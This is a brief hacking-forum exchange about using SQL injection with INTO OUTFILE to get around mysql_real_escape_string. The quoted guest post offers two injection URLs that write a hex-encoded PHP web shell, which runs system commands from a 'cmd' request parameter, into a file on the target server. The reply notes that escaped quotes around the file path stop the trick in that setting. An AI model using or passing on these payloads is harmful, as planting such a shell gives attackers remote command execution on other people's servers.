SQL Injection INTO OUTFILE bypass mysql_real_escape_string

**dharaninja** · 09-22-2015, 01:47 PM

(09-13-2015, 01:06 AM)Guest Wrote: try dis ;
..?id=-1 UniOn SeleCt 0x223c3f2073797374656d28245f524551554553545b27636d64275d293b203f3e22 into outfile '/ur/path/here/lol.php'--+-
or ;
..?id=-1 UniOn SeleCt 0x223c3f2073797374656d28245f524551554553545b27636d64275d293b203f3e22 into outfile '/ur/path/on/hex/here/lol.php'--+

But, mysql_real_escape_string will addslash every single quotes. Example : INTO OUTFILE '/path' will become INTO OUTFILE \'/path\' . So, it wont work